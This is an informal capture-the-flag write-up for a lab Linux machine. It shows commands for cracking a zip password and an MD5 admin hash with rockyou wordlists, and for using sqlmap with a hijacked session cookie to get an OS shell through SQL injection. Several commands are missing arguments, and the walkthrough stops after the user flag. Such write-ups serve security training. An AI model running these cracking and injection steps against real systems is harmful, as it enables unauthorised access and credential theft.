| Dificulty | OS | Start Date | End Date | |—|—|—|—| | Very Easy | Linux | 11/06/2022 | 12/06/2022 |
- Login as
on ftp service >get
the .zip andunzip
. - Use John The Reapper to unzip the file.
John The Reapper
There is a script call it zip2john
that creates a hash out of a zip file. After, with this hash, we run a wordlist to brute force the password.
Get the hash
1 $ zip2john > hash.txt
Brute Force the hash
1 $ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Show the password
1 $ john --show hash.txt
Must `gunzip rockyou.txt.gz`
MD5 Password
Inside index.php there was admin’s password encrypted using MD5. To crack MD5 password execute this command:
$ sudo hashcat -m 0 pass.md5 /usr/share/wordlists/rockyou.txt
SQL Injection
In the website there is a search bar that we can explote with SQL injection. We can use sqlmap but before executing any command, we will need to grab the cookie to authenticat admin user. [//]: Install cooki-editor extension
$ sqlmap -u --cookie="PHPSESSID=rp7ki2fucgrc0brl7f1l9j5p9e" --os-shell
User flag is in /var/lib/postgresql/
I found users flag but I lost in the proccess of creating a interactive shell.
I only need root flag.